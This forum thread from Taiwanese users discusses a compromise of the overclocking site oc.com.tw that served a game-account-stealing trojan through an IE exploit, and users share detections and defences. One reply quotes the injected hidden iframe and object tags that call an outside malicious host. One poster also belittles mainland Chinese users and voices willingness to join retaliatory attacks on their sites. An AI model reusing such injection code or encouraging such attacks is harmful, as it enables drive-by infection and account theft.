"超頻者天堂"網站被植入木馬~
 

賴站長以前執事的"超頻者天堂"網站 http://www.oc.com.tw ,剛剛去看

了一下,電腦突然自動執行一些奇怪的程式.... 經小弟檢查後,發現超頻者天堂也被植入

木馬,這和前些日子"電玩勁檔中心"網站被入侵後所植入的後門程式是一樣的~

這隻木馬名稱是"Smvscr.exe",據小弟在其他網站看到玩家說,這隻木馬的用意主要

是盜取天堂的帳號....請有玩天堂的玩家自行注意~~ 小弟是沒玩天堂啦!

這隻木馬會自動存到c:\windows下,重新開機後即可殺掉!!

這隻木馬的來源是大陸,上被入侵的網站時,同時會開啟2個大陸網址的視窗,這個網址

的地點在安徽省合肥附近!!

真搞不懂,大陸仔老是吃飽沒事幹,喜歡玩這種小孩子在玩的把戲~

現在到大陸網站隨便逛逛,不中個"3721 網路實名"還真的很難.已經到了非常氾濫的

地步了! 請國內玩家留意~.....

:jolin: 還真的有木馬說
小弟用KAV有掃出來
連上國內網站都這樣

一切正常

搜尋 沒這個檔

掃毒 也沒毒！

不知道是否為真…希望 多點人來 探討一下！

試了
完全沒問題
os - win2000pro sp4 updated
browser - mozilla 1.7
anti-virus - sav 8.0 updated
enable firewall

1. <object data="http://zhu.7xi.org/pangzi05/ng.test" weight=0 width=0></object>
2. <iframe src="http://zhu.7xi.org/5.asp" name="zhu" width="0" height="0" frameborder="0">

奇怪了,為何我的會啟動 FTP 程式? 請問有人會嗎?
雖然被攔截了,但我搞不清楚為何會啟動 FTP 程式?
是 ng.test 的關係嗎? 可是他被我擋住了ㄚ?

:confused:

:confused: 我的KAV有抓出來說

這是誤判嗎

exploit.html.mht infomation
This file has been detected because it contains an instruction which attempts to download and install a malicious program on your computer by using a security breach in Internet Explorer.
這是專攻IE漏洞的惡意網頁
算是download.jack的分支
基本上前兩天的windows update過
或用其他瀏覽器應該就沒影響

不是誤判喔, 只是其他的防毒軟體抓不到

這東西的作法是先鑽IIS架的網站
鑽進去後加上強制頁尾
引導網友到某特定網站下載並安裝程式
那大概是與Serron網友PO的程式碼有關
大家可以在OC首頁原始碼最下方看到
但我不確定那是啥

重點大概三個
1. IE安全性調最高
2. 13日的WINDOWS HOTFIX有上
3. 使用別牌瀏覽器上網
三項其中一項生效就沒問題

詳情可以參照
http://www.pcdvd.com.tw/showthread.php?threadid=344066

不是執行"ftp"程式,而是該強行植入的木馬其中的一個叫做"ftp",並非一般的ftp程式~

連這次也算的話,小弟一共中過5次這隻木馬,雖 然解這隻木馬不難,但實在解到很煩了!

....... ╮(╯_╰)╭ ,另外3721(網路實名)小弟已經忘了中過多少次~

小弟上網的習慣,向來都把ie的"安全性"調最低,以便讀取最完整的網頁資料,不會因為

怕木馬,而讓自己上網習慣有所改變~

國內若有人對大陸網站發動"訪問",小弟應會參加一腳,給對岸的俗辣一點顏色看看,讓

對岸知道tw不是好惹的~


再來就看看超頻者天堂怎麼做啦....~